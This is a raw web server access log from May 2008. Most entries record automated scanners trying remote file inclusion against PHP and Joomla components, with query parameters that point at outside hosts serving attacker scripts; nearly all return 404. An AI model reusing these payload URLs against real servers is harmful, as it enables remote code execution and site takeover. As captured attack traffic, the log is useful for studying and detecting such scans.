77.92.140.30 - - [05/May/2008:10:02:30 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://www.trosken.com/idra.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.105.202.170 - - [05/May/2008:10:02:46 -0700] "GET /blog/wp-content/uploads/2008/04/img_1123.JPG HTTP/1.1" 200 1441792 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
206.105.202.170 - - [05/May/2008:10:02:46 -0700] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.1" 200 2162688 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
206.105.202.170 - - [05/May/2008:10:02:47 -0700] "GET /blog/wp-content/uploads/2008/04/img_1133.JPG HTTP/1.1" 200 1900544 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
208.116.44.60 - - [05/May/2008:10:03:04 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:10:03:04 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:10:03:04 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:10:03:05 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:10:03:05 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:10:03:05 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:10:03:28 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:10:03:28 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:10:03:28 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.225.216.227 - - [05/May/2008:10:03:37 -0700] "GET /logs/access_080218.log/index2.php?option=com_search&Itemid=&mosConfig_absolute_path=http://cinta.sitesled.com/batam/sql/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:10:03:39 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:10:03:39 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [05/May/2008:10:03:39 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.197.231.29 - - [05/May/2008:10:03:41 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://galee.freetzi.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
91.197.231.29 - - [05/May/2008:10:03:42 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://galee.freetzi.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:10:04:05 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:04:06 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:04:06 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:10:04:23 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:10:04:24 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:10:04:24 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
189.236.5.128 - - [05/May/2008:10:04:31 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:04:53 -0700] "GET /logs/access_080205.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:04:53 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:04:53 -0700] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:04:56 -0700] "GET /logs/access_080302.log//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:05:04 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:05:04 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
206.227.4.131 - - [05/May/2008:10:05:29 -0700] "GET / HTTP/1.1" 200 11606 "http://www.st-owners.com/forums/showthread.php?t=27302&page=6" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
206.227.4.131 - - [05/May/2008:10:05:30 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9037 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
67.15.90.98 - - [05/May/2008:10:05:30 -0700] "GET /logs/access_071226.log//calendar.php?l=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:10:05:30 -0700] "GET //calendar.php?l=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.90.98 - - [05/May/2008:10:05:30 -0700] "GET /logs//calendar.php?l=ftp://128.175.10.3/incoming/smile04.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.51.45 - - [05/May/2008:10:05:36 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.143.49.246 - - [05/May/2008:10:05:39 -0700] "GET /logs/access.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [05/May/2008:10:05:39 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [05/May/2008:10:05:40 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.227.4.131 - - [05/May/2008:10:05:54 -0700] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.1" 200 3072529 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
213.246.51.45 - - [05/May/2008:10:05:58 -0700] "GET /dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.42 - - [05/May/2008:10:06:02 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [05/May/2008:10:06:03 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [05/May/2008:10:06:03 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.227.4.131 - - [05/May/2008:10:06:03 -0700] "GET /blog/wp-content/uploads/2008/04/img_1123.JPG HTTP/1.1" 200 4659669 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
78.90.30.31 - - [05/May/2008:10:06:08 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.212.173.42 - - [05/May/2008:10:06:16 -0700] "GET /logs/access_071228.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.213.78.87 - - [05/May/2008:10:06:24 -0700] "GET //inc.php?inc=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.227.4.131 - - [05/May/2008:10:06:27 -0700] "GET /blog/wp-content/uploads/2008/04/img_1124.JPG HTTP/1.1" 200 3820844 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
206.227.4.131 - - [05/May/2008:10:06:30 -0700] "GET /blog/wp-content/uploads/2008/04/img_1133.JPG HTTP/1.1" 200 5288628 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
217.67.26.84 - - [05/May/2008:10:06:30 -0700] "GET /logs//calendar.php?l=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [05/May/2008:10:06:30 -0700] "GET //calendar.php?l=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.209.106 - - [05/May/2008:10:06:35 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
75.125.209.106 - - [05/May/2008:10:06:36 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.ownar.xpg.com.br/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:10:06:40 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:10:06:41 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:10:06:42 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.227.4.131 - - [05/May/2008:10:06:47 -0700] "GET /blog/wp-content/uploads/2008/04/img_1130.JPG HTTP/1.1" 200 2031616 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
206.227.4.131 - - [05/May/2008:10:06:47 -0700] "GET /blog/wp-content/uploads/2008/04/img_1129.JPG HTTP/1.1" 200 1114112 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
203.200.95.142 - - [05/May/2008:10:06:55 -0700] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:10:06:56 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:10:06:57 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [05/May/2008:10:07:06 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:10:07:12 -0700] "GET /logs/access_071228.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:10:07:16 -0700] "GET /logs/access_080309.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
203.200.95.142 - - [05/May/2008:10:07:26 -0700] "GET /logs/access_071228.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.niceplace.biz/mambots/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.116.174.9 - - [05/May/2008:10:07:29 -0700] "GET /logs/access_080309.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:07:42 -0700] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:07:42 -0700] "GET /logs/access_080111.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:07:42 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:07:42 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:07:43 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:07:43 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.25.145.85 - - [05/May/2008:10:07:47 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
85.25.145.85 - - [05/May/2008:10:07:48 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:07:55 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:07:55 -0700] "GET //appserv/main.php?appserv_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:07:56 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:08:06 -0700] "GET /logs/access_080120.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
196.35.158.180 - - [05/May/2008:10:08:26 -0700] "GET /logs/access.log//display.php?lang=http://www.hotelmorena.de/media/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
196.35.158.181 - - [05/May/2008:10:08:31 -0700] "GET //display.php?lang=http://www.hotelmorena.de/media/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:08:35 -0700] "GET /logs/access_080205.log//appserv/main.php?appserv_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
196.35.158.180 - - [05/May/2008:10:08:36 -0700] "GET /logs//display.php?lang=http://www.hotelmorena.de/media/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.36.180.234 - - [05/May/2008:10:08:43 -0700] "GET /logs/access_080120.log HTTP/1.1" 200 585838 "-" "Sfmra podlvz czyunorw" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:08:47 -0700] "GET /logs/access_080101.log//classes/adodbt/sql.php?classes_dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
216.146.70.18 - - [05/May/2008:10:08:59 -0700] "GET /logs/access_071229.log//login.php?dir=http://www.dlkownz.com/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.146.70.18 - - [05/May/2008:10:08:59 -0700] "GET /logs//login.php?dir=http://www.dlkownz.com/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
216.146.70.18 - - [05/May/2008:10:09:07 -0700] "GET /logs/access_080211.log//login.php?dir=http://www.dlkownz.com/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:10:09:10 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.246.51.45 - - [05/May/2008:10:09:10 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [05/May/2008:10:09:11 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.44.60 - - [05/May/2008:10:09:11 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
147.46.222.74 - - [05/May/2008:10:09:35 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.46.222.74 - - [05/May/2008:10:09:36 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.46.222.74 - - [05/May/2008:10:09:36 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.freewebs.com/anacoramadrid/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:09:45 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:09:46 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
78.90.30.31 - - [05/May/2008:10:09:46 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.90.30.31 - - [05/May/2008:10:09:47 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.51.45 - - [05/May/2008:10:09:58 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [05/May/2008:10:09:58 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:10:25 -0700] "GET /logs/access_080324.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:10:25 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:10:26 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:10:26 -0700] "GET /logs/access_080123.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
88.166.35.71 - - [05/May/2008:10:10:44 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.246.51.45 - - [05/May/2008:10:11:40 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.246.51.45 - - [05/May/2008:10:11:41 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:11:54 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [05/May/2008:10:11:55 -0700] "GET //appserv/main.php?appserv_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:10:12:06 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
210.112.121.111 - - [05/May/2008:10:12:06 -0700] "GET /logs/access.log//language.inc.php?langs_dir=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:10:12:06 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
85.214.33.45 - - [05/May/2008:10:12:06 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
